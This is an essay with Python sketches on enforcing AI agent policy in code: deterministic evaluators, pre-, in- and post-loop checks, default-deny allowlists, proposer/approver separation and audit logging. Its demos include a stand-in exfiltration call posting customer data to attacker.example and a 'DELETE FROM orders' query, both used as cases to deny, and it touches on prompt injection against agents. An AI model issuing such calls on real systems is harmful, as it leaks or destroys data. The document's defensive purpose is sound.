Policy enforcement — a policy a model can talk its way around is not a control.
Every team writes an agent policy: don't touch production data, get approval over a threshold, never email external parties. Almost every team then "enforces" it by putting it in the system prompt — which makes it a strong suggestion to a non-deterministic optimizer that an adversary is actively trying to redirect. A control is something a model cannot decline. This essay is about turning policy into code, choosing where in the agent loop to enforce it, and the structural patterns — allowlists, separation of duties — that hold when the model is wrong or compromised.
Policy-as-code: the rule is evaluated, not interpreted.
The first move is to take the policy out of natural language and into an executable artifact that runs outside the model: a function, a rules engine, or a policy language of the kind used for cloud authorization (Open Policy Agent's Rego and AWS's Cedar are examples). The agent proposes an action; a deterministic evaluator returns allow or deny before anything happens. This buys three things prompt-based "policy" can never have: it is auditable (the rule is a versioned, reviewable object, not buried in a prompt), testable (you can assert deny on the dangerous cases in CI), and non-bypassable by persuasion (an injected instruction can change which action the model proposes, but no wording changes what the evaluator returns for that action).
    # the model proposes; a deterministic evaluator decides
    decision = policy.evaluate(
        action=proposed_tool_call,
        principal=ctx.principal,
        context=ctx,
    )
    if decision.effect != "allow":
        return Denied(decision.reason)  # fail closed
Keep the policy engine separate from the agent code and version it independently. "Which policy was in force when this ran" must be answerable from the audit record (C1) by id, not by reading old prompts.
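A minimal sketch of such an evaluator, assuming a small in-process policy module. Every name here (`Action`, `Decision`, `POLICY_VERSION`, `ALLOWED_TOOLS`, `evaluate`, the rule ids, the `example.com` domain) is hypothetical and chosen for illustration, not taken from any particular library. The point is only that the rule is plain data plus a pure function, so it can be versioned, asserted against in CI, and identified by id in the audit record.

```python
from dataclasses import dataclass, field

POLICY_VERSION = "policy-2024-01"  # hypothetical id, stamped on every decision

# Hypothetical rule table: tool name -> principals allowed to call it.
ALLOWED_TOOLS = {
    "search_docs": {"support-agent", "research-agent"},
    "send_email": {"support-agent"},
}


@dataclass
class Action:
    tool: str
    args: dict = field(default_factory=dict)


@dataclass(frozen=True)
class Decision:
    effect: str  # "allow" or "deny"
    rule_id: str
    reason: str
    policy_version: str = POLICY_VERSION


def evaluate(action: Action, principal: str) -> Decision:
    """Pure function: the same inputs always produce the same decision."""
    allowed = ALLOWED_TOOLS.get(action.tool)
    if allowed is None:
        return Decision("deny", "R0-default-deny", f"tool {action.tool!r} is not granted")
    if principal not in allowed:
        return Decision("deny", "R1-principal", f"{principal!r} may not call {action.tool!r}")
    if action.tool == "send_email":
        recipient = str(action.args.get("to", ""))
        if not recipient.endswith("@example.com"):
            return Decision("deny", "R2-external-email", "recipient is outside the organization")
    return Decision("allow", "R3-granted", "explicitly permitted")


denied = evaluate(Action("send_email", {"to": "someone@elsewhere.test"}), "support-agent")
print(denied.effect, denied.rule_id, denied.policy_version)
```

Because `evaluate` has no access to the prompt or the model, the dangerous cases can be pinned down as ordinary unit tests, and each `Decision` carries the policy version that produced it.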
Enforce in three places: before, inside, and after the loop.
There is no single chokepoint, because different risks live at different stages. Pre-loop: admission — is this principal allowed to run this agent at all, with what data scope and budget. In-loop: the high-leverage layer — every tool call is checked against policy before execution, with arguments inspected, not just the tool name (the difference between "may call the DB tool" and "may run DELETE"). Post-loop: egress — inspect the agent's output and any outbound payload before it leaves the trust boundary, because a correct sequence of allowed calls can still assemble a disallowed result, like exfiltrating data into a "summary".
- Pre-loop bounds the blast radius before the model runs: scope, budget, data domain.
- In-loop is where autonomy actually does damage, so every effectful call gets argument-level checks.
- Post-loop catches emergent violations that no single step tripped: the assembled outcome, not the steps.
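The three stages can be sketched as three separate checks wrapped around a stubbed agent loop. This is an illustration under stated assumptions, not a reference design: `admit`, `check_tool_call`, `check_egress`, `PolicyDenied`, and the grant tables are all hypothetical names, the SQL check is deliberately crude (a real system would parse the statement), and the SSN-shaped pattern merely stands in for whatever data must not leave the boundary.

```python
import re


class PolicyDenied(Exception):
    """Raised by any enforcement point; callers treat it as fail closed."""


# Pre-loop grants: principal -> agent it may run and its tool-call budget.
ADMISSION = {"alice": {"agent": "reporting-agent", "max_tool_calls": 3}}


def _read_only_sql(args: dict) -> bool:
    # Crude argument inspection: accept only a single SELECT statement.
    sql = str(args.get("sql", "")).strip().rstrip(";")
    return sql.lower().startswith("select ") and ";" not in sql


# In-loop rules: allowed tool -> predicate over its arguments.
TOOL_RULES = {"db_query": _read_only_sql}

# Post-loop: a pattern standing in for data that must not be sent out.
SECRET_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


def admit(principal: str, agent: str) -> int:
    grant = ADMISSION.get(principal)
    if grant is None or grant["agent"] != agent:
        raise PolicyDenied(f"{principal!r} may not run {agent!r}")
    return grant["max_tool_calls"]


def check_tool_call(tool: str, args: dict) -> None:
    rule = TOOL_RULES.get(tool)
    if rule is None or not rule(args):
        raise PolicyDenied(f"call to {tool!r} with these arguments is not granted")


def check_egress(output: str) -> str:
    if SECRET_PATTERN.search(output):
        raise PolicyDenied("output contains data that may not leave the boundary")
    return output


def run(principal: str, agent: str, proposed_calls: list, final_output: str) -> str:
    budget = admit(principal, agent)  # pre-loop
    for n, (tool, args) in enumerate(proposed_calls, start=1):
        if n > budget:
            raise PolicyDenied("tool-call budget exhausted")
        check_tool_call(tool, args)  # in-loop, before execution
        # ... the real tool would execute here ...
    return check_egress(final_output)  # post-loop


def is_denied(*run_args) -> bool:
    try:
        run(*run_args)
    except PolicyDenied:
        return True
    return False


select_call = [("db_query", {"sql": "SELECT id FROM orders"})]
delete_call = [("db_query", {"sql": "DELETE FROM orders"})]
print(run("alice", "reporting-agent", select_call, "3 orders found"))
print(is_denied("alice", "reporting-agent", delete_call, "done"))
print(is_denied("alice", "reporting-agent", select_call, "summary: 123-45-6789"))
```

The last call is the interesting one: every step was individually allowed, and only the egress check notices what the assembled output contains.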
Allowlist, never blocklist.
A blocklist enumerates forbidden actions and permits everything else; for an open-ended generator that invents action sequences, the set of harmful things you didn't think of is unbounded, so a blocklist fails open. An allowlist enumerates permitted tools, permitted argument shapes, permitted destinations, and denies by default — the unanticipated action is refused because it was never granted, not because someone predicted it. This is the single highest-leverage structural decision in agent policy and it must be the default posture at every enforcement point: deny unless explicitly allowed.
A blocklist of "bad" tool calls is security theater against a model an attacker can prompt-inject. The unsafe default — allow-then-block — means your safety depends on having predicted the attack.
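A small sketch of the difference, run against a tool call nobody anticipated. The tool names, the `ALLOWLIST` layout, and the hosts are hypothetical; the allowlist here checks the tool, the exact set of argument names, and the destination host, which is one possible reading of "permitted tools, argument shapes, and destinations".

```python
from urllib.parse import urlparse

BLOCKLIST = {"delete_database", "send_wire"}  # only what someone predicted

# Allowlist: tool -> exact argument names and, where relevant, permitted hosts.
ALLOWLIST = {
    "http_get": {"arg_names": {"url"}, "hosts": {"api.internal.example"}},
    "read_file": {"arg_names": {"path"}, "hosts": None},
}


def blocklist_permits(tool: str, args: dict) -> bool:
    # Fails open: anything not named is permitted.
    return tool not in BLOCKLIST


def allowlist_permits(tool: str, args: dict) -> bool:
    # Fails closed: anything not granted is refused.
    grant = ALLOWLIST.get(tool)
    if grant is None:
        return False
    if set(args) != grant["arg_names"]:  # argument shape must match exactly
        return False
    if grant["hosts"] is not None:
        host = urlparse(str(args["url"])).hostname
        if host not in grant["hosts"]:
            return False
    return True


# A call the policy author never thought about.
novel = ("http_post_webhook", {"url": "https://attacker.example/collect", "body": "customer rows"})
print(blocklist_permits(*novel))  # True: the blocklist did not predict it
print(allowlist_permits(*novel))  # False: it was never granted
```

Nothing about the allowlist required anticipating `http_post_webhook`; the refusal follows from the absence of a grant.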
Separation of duties: no single agent closes the loop on a sensitive action.
For high-consequence operations, borrow one of the oldest controls in finance: the entity that proposes an action cannot be the entity that approves and commits it. An agent may draft a payment, a deletion, or a production change; a separate authority (a different service with different credentials, a second agent with a narrow verifier role, or a human, the operator role developed in C4) must approve before the effect lands. A single compromised or hallucinating agent then cannot unilaterally cause the worst outcome; the attacker has to defeat two independently scoped controls.
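    # proposer and approver are different principals
    draft = agent.propose("refund", amount=9000)
    if draft.amount > 5000:
        approval = approver.review(draft)  # separate authority + creds
        # raise rather than assert: assert statements are skipped under `python -O`
        if approval.granted_by == draft.proposed_by:
            raise PermissionError("proposer cannot approve its own draft")
        commit.apply(draft, approval)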
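A self-contained variant of the same idea, in which the commit step re-verifies the approval instead of trusting its caller. All class and field names are hypothetical. An HMAC over the draft, made with a key the proposing agent never holds, stands in for "separate credentials"; this is an assumption for the sketch, and a real deployment might prefer asymmetric signatures or tokens issued by an approval service.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional

APPROVAL_THRESHOLD = 5000  # same threshold as the snippet above


@dataclass(frozen=True)
class Draft:
    draft_id: str
    kind: str
    amount: int
    proposed_by: str


@dataclass(frozen=True)
class Approval:
    draft_id: str
    granted_by: str
    signature: str


def _sign(key: bytes, draft: Draft, granted_by: str) -> str:
    # Bind the approval to the exact draft contents and to the approver.
    msg = f"{draft.draft_id}|{draft.kind}|{draft.amount}|{granted_by}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


class Approver:
    """Holds a key the proposing agent never sees."""

    def __init__(self, principal: str, key: bytes):
        self.principal, self._key = principal, key

    def review(self, draft: Draft) -> Approval:
        if draft.proposed_by == self.principal:
            raise PermissionError("proposer cannot approve its own draft")
        return Approval(draft.draft_id, self.principal, _sign(self._key, draft, self.principal))


class Committer:
    """Re-checks the approval itself rather than trusting the caller."""

    def __init__(self, approver_key: bytes):
        self._key = approver_key

    def apply(self, draft: Draft, approval: Optional[Approval]) -> str:
        if draft.amount > APPROVAL_THRESHOLD:
            if approval is None or approval.granted_by == draft.proposed_by:
                raise PermissionError("independent approval required")
            expected = _sign(self._key, draft, approval.granted_by)
            same_draft = approval.draft_id == draft.draft_id
            if not same_draft or not hmac.compare_digest(expected, approval.signature):
                raise PermissionError("approval does not match this draft")
        return f"committed {draft.kind} {draft.draft_id}"


key = b"approver-only-secret"  # placeholder; never shared with the agent
draft = Draft("d-1", "refund", 9000, proposed_by="refund-agent")
approval = Approver("finance-reviewer", key).review(draft)
result = Committer(key).apply(draft, approval)
print(result)
```

Because the signature covers the amount, an agent that obtains approval for one draft and then alters the figure is refused at commit time.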
Tie enforcement to the audit trail, both ways.
Enforcement and audit are one system. Every policy decision — allow and deny — must be written to the C1 trail with the rule id, the inputs evaluated, and the outcome, so "why was this blocked" and "why was this permitted" are both answerable later. Denials are the more valuable signal: a rising deny rate on a path is an early indicator of a misbehaving agent, a prompt-injection campaign, or a policy that is wrong for the real workload. Enforcement without audit cannot be reviewed; audit without enforcement only records the damage.
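A sketch of what recording every decision might look like, with a deny-rate calculation over the result. The schema of the C1 trail is not given here, so the record fields are an assumption, an in-memory list stands in for the real append-only store, and the function names and rule ids are hypothetical.

```python
import json
import time
from collections import Counter

AUDIT_TRAIL = []  # stand-in for the real append-only store


def record_decision(rule_id, policy_version, principal, tool, args, effect, now=None):
    """Append one JSON line per decision, allow and deny alike."""
    entry = {
        "ts": time.time() if now is None else now,
        "policy_version": policy_version,
        "rule_id": rule_id,
        "principal": principal,
        "tool": tool,
        "args": args,  # the inputs the rule actually evaluated
        "effect": effect,
    }
    AUDIT_TRAIL.append(json.dumps(entry, sort_keys=True))
    return entry


def deny_rate_by_tool(trail):
    """Fraction of decisions per tool that were denials."""
    total, denied = Counter(), Counter()
    for line in trail:
        entry = json.loads(line)
        total[entry["tool"]] += 1
        if entry["effect"] == "deny":
            denied[entry["tool"]] += 1
    return {tool: denied[tool] / total[tool] for tool in total}


record_decision("R3-granted", "policy-v7", "support-agent", "search_docs", {"q": "refund policy"}, "allow")
record_decision("R2-external-email", "policy-v7", "support-agent", "send_email", {"to": "x@elsewhere.test"}, "deny")
record_decision("R2-external-email", "policy-v7", "support-agent", "send_email", {"to": "y@elsewhere.test"}, "deny")
record_decision("R3-granted", "policy-v7", "support-agent", "send_email", {"to": "a@example.com"}, "allow")

rates = deny_rate_by_tool(AUDIT_TRAIL)
print(rates)
```

In practice the evaluated arguments may need redaction before they are stored, and the deny rate would be computed over a time window so that a sudden rise on one path stands out.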
The honest tradeoff.
Hard enforcement has a real cost: every gate adds latency and engineering work, an overtight allowlist generates false denials that push users toward shadow workarounds, and a separate policy engine is another system to keep correct and in sync. But the alternative, policy that lives only in a prompt, is not a weaker control; it is the absence of a control wearing the costume of one. Enforce the rules that protect against irreversible or regulated harm in code outside the model, and leave to prompt guidance only the rules whose violation would make an outcome slightly worse and nothing more.